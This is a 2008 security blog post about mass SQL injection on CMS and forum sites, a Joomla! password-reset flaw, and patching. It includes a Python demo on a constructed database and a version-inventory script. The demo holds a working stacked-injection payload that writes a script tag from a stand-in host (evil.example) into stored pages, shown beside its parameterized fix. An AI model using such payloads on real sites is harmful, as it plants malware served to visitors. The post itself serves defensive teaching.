Web Application Vulnerabilities Can Make The Difference - How To Tackle The Threat
August 18th, 2008
Automated SQL injection attacks against websites have truly changed the Web threat landscape this year. Attack toolkits misuse search engines to find vulnerable Web pages. One reason such attacks remain so successful is that they do not depend on a single Web server vulnerability that could simply be patched. Rather, they work because of security flaws in many widespread Web applications which, on some pages, do not sufficiently validate user input submitted via Web forms or URL parameters. Commonly deployed Web applications of this kind include Content Management Systems, weblog and Internet forum software.
The result of such a flaw is usually that attacker-supplied text from an unvalidated URL parameter or HTTP POST body is concatenated into a SQL statement, which the Web application then executes because the input was neither validated nor passed to the database as a bound parameter. Executing the injected SQL usually leads to malicious script code being written into the database tables that store the HTML content of dynamically generated Web pages, so that every subsequent visitor of those pages loads the attacker's script.
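To make the mechanism concrete, here is an added example (not code from the original post or from any of the applications it mentions) with the vulnerable concatenated query beside its parameterized replacement. The database, tables, and payload are constructed for the example, and the stacked-statement driver is a stand-in written here to mimic database layers that execute several semicolon-separated statements in one call; Python's own sqlite3 module refuses that in execute(), which is why the simulation exists.

```python
import sqlite3

# Constructed sample database: a 'news' table queried by id from a URL
# parameter, and a 'pages' table holding the HTML bodies a CMS renders.
def setup():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO pages(body) VALUES ('<p>Welcome</p>'), ('<p>Contact us</p>');
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news(title) VALUES ('First post');
    """)
    return conn

# Constructed payload for a URL such as news.php?id=<payload>: a second,
# stacked statement appends a script tag to every stored page body.
# (SQLite concatenates strings with ||; other engines use + or CONCAT.)
PAYLOAD = ("1; UPDATE pages SET body = body || "
           "'<script src=\"http://evil.example/x.js\"></script>'")

def split_statements(sql):
    """Split SQL text on the semicolons that really end a statement."""
    buf = ""
    for chunk in sql.split(";"):
        buf += chunk + ";"
        if sqlite3.complete_statement(buf):
            if buf.strip(";").strip():      # skip empty statements
                yield buf
            buf = ""

def stacked_execute(conn, sql):
    """Stand-in (assumption about driver behaviour) for a database layer that
    runs every stacked statement and returns the first result set."""
    cur = conn.cursor()
    first_rows = None
    for stmt in split_statements(sql):
        cur.execute(stmt)
        if first_rows is None:
            first_rows = cur.fetchall()
    return first_rows or []

def vulnerable_lookup(conn, news_id):
    """Vulnerable: the raw URL parameter is pasted into the SQL text."""
    return stacked_execute(conn, "SELECT title FROM news WHERE id = " + news_id)

def safe_lookup(conn, news_id):
    """Hardened: the value is bound as a parameter, so it is only ever data."""
    cur = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,))
    return cur.fetchall()

def infected(conn):
    """True if any stored page body now carries a script tag."""
    rows = conn.execute("SELECT body FROM pages").fetchall()
    return any("<script" in body for (body,) in rows)

if __name__ == "__main__":
    db = setup()
    print(vulnerable_lookup(db, PAYLOAD), infected(db))   # [('First post',)] True
    db = setup()
    print(safe_lookup(db, PAYLOAD), infected(db))         # [] False
```

The vulnerable lookup still returns the expected news row, so the page renders normally while every stored page body has been modified; the hardened lookup returns nothing for the payload because the whole string is compared as a value, and the pages stay clean. Binding parameters is the fix; additionally rejecting a non-numeric id before the query is cheap defense in depth.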
Yet SQL injection is not the only type of vulnerability that can lead to a website's compromise. One recent example is an authentication bypass vulnerability discovered in the popular open-source Content Management System Joomla!. The vulnerability allows an attacker to reset the password of the installation's first user account, usually an administrator; afterwards the attacker can log into the system and perform malicious acts such as inserting malicious code into the legitimate pages.
It is most important for website administrators to assess which Web applications are installed on their servers, stay up to date with the vulnerabilities recently discovered in those systems, and apply patches as soon as the vendor provides them. Can a hastily applied patch break some (legacy) functionality in the Web application? Maybe, but not applying the patch on an Internet-facing system will sooner or later break much more. An infected website not only serves malware to your visitors, it also costs you the confidence of your visitors and of your business's customers. As a proactive measure against common attacks such as SQL injection, placing an application-aware firewall with an intrusion prevention system in front of your Web server can save you a lot of trouble; such a device filters known attack patterns and buys time, but it does not replace patching the application itself.
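Knowing what is installed is the first step of the assessment above, and on a shared host it is easy to lose track of forgotten installations. The following added example (not part of the original post) walks a webroot, looks for the marker files of common applications and extracts their version strings. The marker paths and regular expressions are assumptions about the WordPress and Joomla! 1.5 tree layouts; the sample webroot is constructed in a temporary directory.

```python
import os
import re
import tempfile

# Marker file (relative to an install directory) and the patterns whose
# captures, joined with dots, form the version. Assumed layouts, not taken
# from the original post: WordPress keeps $wp_version in
# wp-includes/version.php; Joomla! 1.5 keeps $RELEASE and $DEV_LEVEL in
# libraries/joomla/version.php.
SIGNATURES = {
    "WordPress": ("wp-includes/version.php",
                  [re.compile(r"\$wp_version\s*=\s*'([^']+)'")]),
    "Joomla! 1.5": ("libraries/joomla/version.php",
                    [re.compile(r"\$RELEASE\s*=\s*'([^']+)'"),
                     re.compile(r"\$DEV_LEVEL\s*=\s*'([^']+)'")]),
}

def version_from(path, patterns):
    """Return the version assembled from the patterns' captures, or None if
    any pattern is missing (a modified or unknown marker file)."""
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    parts = []
    for pat in patterns:
        m = pat.search(text)
        if not m:
            return None
        parts.append(m.group(1))
    return ".".join(parts)

def inventory(webroot):
    """Walk webroot and return sorted (install_dir, app, version) triples for
    every directory that carries a known marker file."""
    found = []
    for dirpath, _dirnames, _filenames in os.walk(webroot):
        for app, (marker, patterns) in SIGNATURES.items():
            marker_path = os.path.join(dirpath, *marker.split("/"))
            if os.path.isfile(marker_path):
                version = version_from(marker_path, patterns) or "unknown"
                found.append((os.path.relpath(dirpath, webroot), app, version))
    return sorted(found)

def build_sample_webroot():
    """Constructed sample tree: a WordPress blog and a Joomla! 1.5 site."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "blog/wp-includes/version.php": "<?php\n$wp_version = '2.6';\n",
        "cms/libraries/joomla/version.php":
            "<?php\nclass JVersion {\n\tvar $RELEASE = '1.5';\n"
            "\tvar $DEV_LEVEL = '5';\n}\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
    return root

if __name__ == "__main__":
    for install_dir, app, version in inventory(build_sample_webroot()):
        print(f"{install_dir:10} {app:12} {version}")
```

Run against the real webroot, the output is the list to check against the vendors' advisories; a site that does not appear in it because its marker file was tampered with shows up as "unknown" and deserves a closer look rather than a pass.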
Home users and administrators of corporate PCs need to ensure that anti-malware software is in place and kept current. Sounds like old news? Yes, but the continuing prevalence of the old NetSky worm, as well as the continuing exploitation of 2006's MDAC vulnerability (MS06-014), underlines that far too many users are still recklessly surfing the Web without proper protection in place. Also assess which third-party applications are installed: are the installed versions of Flash Player, Adobe Reader, QuickTime, Java and others up to date, and are they kept up to date? Attackers are increasingly exploiting vulnerabilities in these applications as well.
Author: Anti-Malware Team
McAfee Research Blog